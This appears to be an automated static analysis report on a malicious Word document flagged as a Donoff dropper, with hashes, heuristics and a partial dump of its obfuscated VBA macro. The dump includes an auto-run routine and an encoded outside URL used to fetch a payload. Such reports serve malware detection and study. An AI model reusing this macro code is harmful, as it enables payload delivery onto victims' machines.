Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182ac5d9689be1c1…

MALICIOUS

Office (OLE)

100.0 KB Created: 2016-05-31 22:19:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 1254fbf55483c9f4ec2daf0fe2cbe246 SHA-1: 1b728a40a4c2fbaab697ee2ba8875fd9ad4dbfd3 SHA-256: 182ac5d9689be1c1169e1ccf08eca6f4f745104b7ef665344fceb3acba229d10
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro, along with 'CreateObject' and 'CallByName' calls, indicates an attempt to execute code upon opening. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper malware. The VBA code is heavily obfuscated, but the presence of these indicators points to a malicious dropper designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18353 bytes
SHA-256: a134f23ee10b07b941b8d1f1bce4d644cddcf932374d943a91c1d43e0b99baa3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub lkswGSHNVuTAQ(ByVal omQZrkiVPngMZw As String, ByVal peoQWzJfdX As Integer)
VIfjXBzOOIOwxo True, "rLuIztlckEAe", 9044
bkgCuZoYdtPvT "brfqXBb1FG", "xXmt6cN1sdjN"
JGtAgsTnoqG
lCPTKRZExOo = 6741
If UmgYc("CubvvVU1AS", 886, 440) Then
cmmRVObVQe = 9024
ftWCW
drTbEZVgssazF 1883
miEyuzJOiITog = 3192
TYGwFzqKih "du1M2Yb8LO5"
OtEHtGvFpsmxw = "Cb753mIufhHfKj"
Else
eVotAb 653, 5024, 4694
HOoHlL "0EU7OPKnWOQBp", 9258
hxqbWrAyD
JrrWDfLp = False
End If
End Sub
Private Sub EZkcFRxnRjouTl(ByVal MuSLxrZ As Integer)
cvXQJPIOxxe "0p3GOHg9GAjBUDK", "lWCFr4ovNAL", "lUxS5dTIL"
EymBSI = 358
iDOTKcGepkOAeE
sCAHDhUqizd = "m2uYSx9r57x6CV"
If DzPrxDwcLEKWX(True, 55, True) Then
mLVGipakLwl = 4069
mWyBxJiVQ 555, "sJ3EJMvxKjvUFs", 2131
uGzOfaOdNBuW = "wXPe1c1QiWNfYg"
aBYsyTlLOxb
Else
wiXEZX
JSzAaGnyj 9355
gNLfZVRnimxxR = "3CSAuj8FKvsfJJ"
End If
End Sub
Private Sub Document_Open()
Dim fUavOXs As Integer
Dim ysvMDfdzG As Boolean
QljCDRAhYYJeK.VMrLsxqGWZhW
End Sub

Attribute VB_Name = "QljCDRAhYYJeK"
Private Sub PbzYzSnrytYs(ByVal QvhDTEOB As String, ByVal iABgsQUWuywQ As String)
AcYriFBAyXe "a6uOKc4W0jRot2"
nFuWiLofk = "AsOckSqPD99m"
MQlLJrJaJGmdyr "9mOnOm196xOk", "dulLa7Po3jozWL", True
End Sub
Private Sub wpPBaZlNg(ByVal OdhAsRdvKl As Integer, ByVal UdqvvCAKEHp As String)
qKKygiydbcpeHi 3110
FzuUMcZI = 6371
CamHpqofVQJtzq "ZvNzbYqJZJ1yO", "7O9YXtkGHRbC"
faLwgw = True
FxGyLJvXkDuXnm
End Sub
Private Sub CjzNnDnizcfDgX(ByVal fbBDpNgzD As String, ByVal yXbTmGSHZZEzUu As Boolean)
okVkXeIkJG
WspbhijATvOQnh
XoYDn
End Sub
Public Function vtJeRYrx(ByVal uNHgaheI As String, ByVal vpXcp As String) As Object
Dim QQACfBvnEL As Integer
Dim iYKQhSBvjnh As String
Set vtJeRYrx = UTgowUeRVo(CreateObject(uNHgaheI))
End Function
Public Sub VMrLsxqGWZhW()
Dim IAgTLGtVXy As String
Dim vOGRlLXd As Integer
On Error GoTo irqbbTdEaF
VWPRmiQm.ycjedji
VWPRmiQm.MCubUOGGpxO
KevtNctmqcnMPu
Exit Sub
irqbbTdEaF:
End Sub
Private Sub UJtyIdEHGgj(ByVal cynhCXtpuZ As String)
EyvlKVzYsFu = "MZzFvjMhG"
If TTaCzGlAULM Then
NqrcviW False, "1J7m64CfrsIAs"
SCSazX
OfGfjkCHRKg True
Else
DIgpVqxKez 2123
End If
DVDZuspk "omWl6LySYh", 972
End Sub
Private Function UTgowUeRVo(ByVal tNaSQ As Object) As Object
Dim YBEMFJns As Integer
Set UTgowUeRVo = tNaSQ
End Function
Private Sub EoGcJRDhX(ByVal ugUysMpMUOif As String, ByVal LWMEHeWYA As String, ByVal cjiLQGcJHG As String)
Set MUSpHmv = NPueVrFYLnjLh.ppnPuwNle(True, cjiLQGcJHG)
NPueVrFYLnjLh.WnJKbAfDLckP KeWRwAnEnFR, 2670, "8aobfhvxYQM", MUSpHmv
JCyeWXOiyKhqyn.ZfIDrxSj cagYBeiSN.BfgxxHh(ndkhuPNeKaHRXK, MUSpHmv, 8879), False, "VSl6YUeDfo", ugUysMpMUOif
End Sub
Private Sub KevtNctmqcnMPu()
Dim YUqAlGJK As Boolean
EoGcJRDhX JCyeWXOiyKhqyn.GKbsdtedofVe, "uNlQmvYTMgvpWz", EOdsVSPnuYTLt
JCyeWXOiyKhqyn.FeZivkODwFK False, 618, JCyeWXOiyKhqyn.GKbsdtedofVe
End Sub
Private Function KeWRwAnEnFR() As String
KeWRwAnEnFR = oGDphuZ.GduvfnbzJkCRA("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function ndkhuPNeKaHRXK() As String
ndkhuPNeKaHRXK = oGDphuZ.GduvfnbzJkCRA("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function EOdsVSPnuYTLt() As String
EOdsVSPnuYTLt = oGDphuZ.GduvfnbzJkCRA("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "oGDphuZ"
Private Function OabmIabiHpIOX(ByVal dWXqRYKkmZr As Integer, ByVal tsXIcBJwI As Integer, ByVal LUYteSeZzx As String, ByVal rvPMoqpvdb As String) As String
If Not kaShcLt.cKVuqwbFwPxEo(rvPMoqpvdb, False, False, LUYteSeZzx) Then
OabmIabiHpIOX = rvPMoqpvdb
End If
End Function
Private Function qCXcVwnCKhP(ByVal wJXruvwcaAXl As String) As String
wbhMqFiLIuXxUH
krKOU = False
lHIEk
qCXcVwnC
... (truncated)